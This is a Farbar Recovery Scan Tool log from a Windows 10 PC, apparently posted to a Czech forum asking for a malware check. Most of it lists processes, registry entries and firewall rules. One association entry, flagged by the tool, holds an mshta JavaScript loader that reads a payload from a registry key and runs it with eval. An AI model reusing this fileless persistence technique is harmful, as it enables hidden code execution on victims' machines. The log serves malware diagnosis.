2017-03-14 18:35 - 2017-03-04 07:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-03-13 16:26 - 2017-03-13 16:26 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-03-13 16:26 - 2017-03-13 16:26 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\roottools.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00165376 _____ () C:\Program Files\Autodesk\Autodesk Sync\qjson_Ad_0.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00050176 _____ () C:\Program Files\Autodesk\Autodesk Sync\QtSolutions_MFCMigrationFramework_Ad_2.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00062464 _____ () C:\Program Files\Autodesk\Autodesk Sync\qoauth_Ad_1.dll
2015-12-15 20:42 - 2015-12-15 20:42 - 00932864 _____ () C:\Program Files\Autodesk\Autodesk Sync\qca_Ad_2.dll
2016-11-15 21:25 - 2016-11-15 21:25 - 00061440 _____ () C:\Program Files\CCleaner\lang\lang-1029.dll
2016-07-16 12:42 - 2016-07-16 12:42 - 01872384 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSEngine_OneCore.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00061968 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2016-12-02 18:51 - 2016-07-01 07:39 - 00110608 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-10-01 14:49 - 2017-02-23 19:35 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-01 14:49 - 2017-02-23 19:34 - 65708992 _____ () C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\libcef.dll
2016-10-01 14:49 - 2017-02-23 15:30 - 00338488 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-01 14:49 - 2017-02-23 15:30 - 02443320 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00385592 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00543288 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-10-01 14:49 - 2017-02-23 15:30 - 00468536 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-02 18:51 - 2013-09-23 18:52 - 00043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2016-12-02 18:51 - 2015-11-05 13:07 - 00742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2016-12-02 18:51 - 2016-07-01 07:05 - 00285632 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\cs-CZ\AdWingManRes.dll
2016-12-02 18:51 - 2015-09-08 07:31 - 40640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll
2016-12-02 18:51 - 2014-09-03 01:29 - 00950272 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\ffmpegsumo.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\.scr: AutoCADScriptFile => C:\WINDOWS\system32\notepad.exe "%1"
HKU\.DEFAULT\Software\Classes\d313270: "C:\WINDOWS\system32\mshta.exe" "javascript:TW9QKQ5="M";W1H=new ActiveXObject("WScript.Shell");dyF0py="TdPGlWw";pLJ3D=W1H.RegRead("HKCU\\software\\evzi\\ivvn");grWNe4t7="hCDpe";eval(pLJ3D);Atr0SAD="gO8Gu";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-07-10 12:04 - 2017-03-15 21:01 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Nekut\Downloads\20_15544_8b2ef1afed30ce1.jpg
DNS Servers: 192.168.1.20 - 192.168.10.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
mpsdrv => Firewall Service is not running.
MpsSvc => Firewall Service is not running.
bfe => Firewall Service is not running.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKLM\...\StartupApproved\StartupFolder: => "CodeMeter Control Center.lnk"
HKLM\...\StartupApproved\Run32: => "LogMeIn Hamachi Ui"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "EADM"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\StartupApproved\Run: => "Steam"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2C739945-6CE6-401C-8A56-413B9047BC52}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{CEC4E7E5-5CA4-4D2E-8536-AF3057B4112F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Skyrim\SkyrimLauncher.exe
FirewallRules: [{C64359FC-D344-466D-81FC-4B5A7D613C8A}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{A3A84145-F305-4467-80F6-E8F059E7B38C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [UDP Query User{28BF43FB-6E17-4BC9-B664-FE60A3E1F795}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [TCP Query User{960FC5A6-B689-4D0C-8CB3-5B6B13E8A252}D:\games\assetto corsa\acs.exe] => (Allow) D:\games\assetto corsa\acs.exe
FirewallRules: [UDP Query User{70EA34E7-D380-4AA7-B630-E44F9EBDBF55}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [TCP Query User{D9BE0F07-713A-4C7D-BBF5-69E6D3AA456C}C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe] => (Allow) C:\program files\goat simulator\binaries\win32\goatgame-win32-shipping.exe
FirewallRules: [{C932D19A-83C5-4E9A-8621-7FB1E16B9FE4}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{842EEF74-E01B-4251-B14F-AE52F479B695}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{4AAE633B-A344-46AA-A0FB-B65C5CA8EEC0}] => (Allow) LPort=35359
FirewallRules: [{E234A8A0-FC92-477F-8D96-BC8EA9736C02}] => (Allow) LPort=35359
FirewallRules: [UDP Query User{445AEBC2-7551-4859-BF7C-B7EFBA93C718}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [TCP Query User{D39FC987-5695-45D9-B471-72A6E8EDF82C}C:\program files (x86)\java\jre1.8.0_66\bin\java.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\java.exe
FirewallRules: [UDP Query User{1D4275C1-B96B-4321-BEDC-BDB9441F005F}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [TCP Query User{7D6632F2-6401-4B58-BD71-E308C0E2862C}D:\games\assetto corsa\acs_x86.exe] => (Allow) D:\games\assetto corsa\acs_x86.exe
FirewallRules: [{D6B0B055-BA21-42F9-AF82-8EB6B0671EDB}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{B13B5683-96DA-40C9-853F-83D8F1E8311E}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6BC96264-0C0F-4DEE-AB7B-ED060088B268}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{55383924-F7BA-4E9A-93F9-3D4FBD194AF5}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{89C2649E-DA28-44E7-9C1C-710EB2B4F806}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{062BE7E7-2737-4786-8441-2C486848EA6A}] => (Allow) C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{EFE6DE3A-FFDF-4504-B2DF-F76E64C3F15A}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{23FAB33E-4807-42AA-AFA6-C67BD22A5BB0}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{6C19374D-7CAC-45A0-BE25-1EB2CFAC0480}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [UDP Query User{D9347118-9F09-415C-8677-2B4CA99BA2CE}D:\games\archicad 18\archicad.exe] => (Allow) D:\games\archicad 18\archicad.exe
FirewallRules: [TCP Query User{FAE0DFDF-A5DC-4765-A413-26A05ECF7B34}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{FF2639AC-4628-4B1F-A2B9-25BDE7E932D5}D:\games\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) D:\games\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{D73CD750-448A-4059-91CB-0D9901C5BD6B}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{0F4A6118-DBD6-40C8-9569-8EF064AD8433}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [{B5279392-29B4-4ABE-AB30-85E6B994F9E9}] => (Allow) C:\Program Files (x86)\WIBUKEY\Server\WkSvW32.exe
FirewallRules: [TCP Query User{15CE73A5-271D-44E2-9066-F9FAD9DF43DD}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [UDP Query User{33F8D17D-D01D-4B70-B3A7-699CA0960C4F}C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe] => (Allow) C:\users\nekut\appdata\roaming\.minecraft\java\bin\javaw.exe
FirewallRules: [{B3390D60-A055-4799-8928-7985E45D5073}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{119C46D2-D69F-4916-93D0-A492D3018FA3}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{D2B8970F-A339-455F-9BF2-551BE7A0AF7A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A84C5F67-63EF-40CF-8097-67C4F89AA0FE}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [TCP Query User{F8FC7D3F-4200-47CB-95A3-7DF412DD1D9B}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [UDP Query User{51EB5D95-5A2C-4F83-8850-D2946515AE58}C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_66\bin\javaw.exe
FirewallRules: [{986167C5-E51F-4C37-BB35-97E62DEEBE01}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{7C3F5ED7-3192-42E0-8A9E-77E040E4AD9F}] => (Allow) C:\Program Files (x86)\Mr DJ\Grand Theft Auto San Andreas\gta_sa.exe
FirewallRules: [{137FC7D5-30B5-4BBA-A710-8283E6609937}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [{297E11F7-F88D-4C77-9C9E-55BD784FF74E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9CFB2900-ED4C-4409-80AD-6D01C922FF13}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C767A13B-406C-4B07-B639-7EADA888EA8F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{0807AA42-C8B9-4D19-B4E5-DB8DB628D0C6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\NvContainer.exe
FirewallRules: [TCP Query User{6834D14F-6071-4035-BD73-4DAAC949DDEF}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [UDP Query User{BAFB7D01-629D-446C-8553-FCC0E87B72C4}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe] => (Allow) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\archicad.exe
FirewallRules: [TCP Query User{1537CADF-6729-42B5-94CD-413F17548A1C}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [UDP Query User{D939E31F-AE2F-4685-909F-B6DAAB94D96E}D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe] => (Block) D:\instalačky\graphisoft archicad 20 build 3012 (x64) portable-=team os=-\archicad 20 portable\archicad 20 portable\archicad 20\archicad 20\overwatchserver.exe
FirewallRules: [TCP Query User{B44FE750-634B-4269-BB85-33B46F6758AD}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [UDP Query User{8664C386-999B-4BD2-9229-BEC8EC119384}E:\archicad 18\archicad.exe] => (Allow) E:\archicad 18\archicad.exe
FirewallRules: [TCP Query User{28811D0E-1839-44CC-917C-A453AA19F38F}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [UDP Query User{5072A21D-4055-4A7F-A331-95093DD4FC06}E:\archicad 18\cinerender\cinerender 64bit.exe] => (Allow) E:\archicad 18\cinerender\cinerender 64bit.exe
FirewallRules: [{33263AE2-FE54-40B1-A6D2-2E75CD0F8ACC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F5F55D69-1237-4BF8-B325-8F0F8F18536C}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [UDP Query User{8EA80FD9-0C40-4D26-846A-114D98451260}C:\games\far cry primal\bin\fcprimal.exe] => (Allow) C:\games\far cry primal\bin\fcprimal.exe
FirewallRules: [{099E4F8C-7A71-4C04-8B64-B0AE458750F4}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe] => Enabled:CodeMeter Runtime Server
==================== Restore Points =========================
Could not list restore points
Check "winmgmt" service or repair WMI.
==================== Faulty Device Manager Devices =============
Could not list Devices. Check "winmgmt" service or repair WMI.
==================== Event log errors: =========================
Could not start eventlog service, could not read events.
System error 123 has occurred.
The filename, directory name, or volume label syntax is incorrect.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz
Percentage of memory in use: 20%
Total physical RAM: 16339.81 MB
Available physical RAM: 12949.95 MB
Total Virtual: 16339.81 MB
Available Virtual: 13025.66 MB
==================== Drives ================================
Drive c: (Systém) (Fixed) (Total:194.76 GB) (Free:64.23 GB) NTFS
Drive d: (Data) (Fixed) (Total:736.2 GB) (Free:46.62 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or (Size: 931.5 GB) (Disk ID: 00000000)
Partition: GPT.
==================== End of Addition.txt ============================
Re: Prosím o kontrolu logu
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
Ran by Nekut (administrator) on DESKTOP-S3S217H (16-03-2017 16:46:58)
Running from C:\Users\Nekut\Desktop
Loaded Profiles: Nekut (Available Profiles: Nekut)
Platform: Windows 10 Home Version 1607 (X64) Language: Czech (Czech Republic)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1051_none_7f2bf7ea21d201b2\TiWorker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessLasso.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessGovernor.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk Inc.) C:\Windows\Temp\AdAppMgrUpdater.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-08-21] (Realtek Semiconductor)
HKLM\...\Run: [OODefragTray] => C:\Program Files\OO Software\Defrag\oodtray.exe [4465448 2014-08-29] (O&O Software GmbH)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [MRT] => C:\WINDOWS\system32\MRT.exe [138634176 2017-03-14] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1519800 2016-12-28] (COMODO)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM-x32\...\Run: [4StoryPrePatch] => C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
HKLM-x32\...\Run: [GameforgeLive] => "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [BitTorrent] => C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe [1984200 2017-02-14] (BitTorrent Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Policies\Explorer: []
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\MountPoints2: {cb3db3c3-4bfd-11e5-9bdf-d8cb8a9936d5} - "F:\setup.exe"
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\O&O Defrag Tray.lnk [2017-03-01]
ShortcutTarget: O&O Defrag Tray.lnk -> C:\Windows\Installer\{50C961A1-889F-4A4E-9587-2772A45B6AAD}\app_icon.ico ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.20 192.168.10.1
